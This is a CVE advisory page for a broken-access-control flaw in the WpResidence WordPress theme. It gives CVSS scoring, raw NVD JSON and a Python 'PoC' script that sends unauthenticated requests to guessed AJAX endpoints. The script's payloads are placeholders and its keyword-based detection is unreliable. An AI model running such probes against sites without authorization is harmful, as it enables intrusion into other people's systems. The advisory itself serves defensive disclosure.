Security Vulnerability Report
中文
CVE-2025-64199 CVSS 5.3 MEDIUM

CVE-2025-64199

Published: 2025-10-29 09:15:39
Last Modified: 2026-04-27 16:16:35

Description

Missing Authorization vulnerability in WpEstate wpresidence wpresidence allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects wpresidence: from n/a through <= 5.3.2.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WpResidence <= 5.3.2
WpEstate (all versions through 5.3.2)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64199 PoC - WpResidence Missing Authorization # This PoC demonstrates the Broken Access Control vulnerability in WpResidence theme <= 5.3.2 # Note: This is for educational and authorized testing purposes only import requests import sys def check_vulnerability(target_url): """ Check if the target WordPress site with WpResidence theme is vulnerable """ # Common WpResidence AJAX endpoints that may be affected endpoints = [ "/wp-admin/admin-ajax.php", "/wp-content/themes/wpresidence/ajax_calls.php" ] # Sample vulnerable parameters - these are example payloads # Actual vulnerable parameters may vary based on theme version test_payloads = [ {"action": "wpresidence_ajax", "wpresidence_upload": "test"}, {"action": "wpresidence_admin_action", "option": "test"}, {"action": "wpresidence_save_settings", "data": "test"} ] print(f"[*] Scanning target: {target_url}") print(f"[*] Checking for CVE-2025-64199 vulnerability\n") vulnerable = False for endpoint in endpoints: url = target_url.rstrip('/') + endpoint for payload in test_payloads: try: # Test without authentication response = requests.post(url, data=payload, timeout=10) # Check if response indicates successful unauthorized access # This may manifest as: # - 200 OK response with admin-level data # - Missing 403 Forbidden or login redirect if response.status_code == 200: # Check if response contains sensitive data if any(indicator in response.text.lower() for indicator in ["admin", "settings", "config", "success"]): print(f"[!] Potential vulnerability found at {url}") print(f"[!] Payload: {payload}") print(f"[!] Status: {response.status_code}") vulnerable = True except requests.RequestException as e: print(f"[-] Error testing {url}: {e}") if vulnerable: print("\n[+] Target appears to be VULNERABLE to CVE-2025-64199") print("[+] Recommendation: Update WpResidence theme to version > 5.3.2") else: print("\n[-] Target does not appear to be vulnerable or theme not detected") print("[-] Manual verification recommended") return vulnerable if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-64199-poc.py <target_url>") print("Example: python cve-2025-64199-poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64199", "sourceIdentifier": "[email protected]", "published": "2025-10-29T09:15:39.490", "lastModified": "2026-04-27T16:16:34.600", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WpEstate wpresidence wpresidence allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects wpresidence: from n/a through <= 5.3.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/wpresidence/vulnerability/wordpress-wpresidence-theme-5-3-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}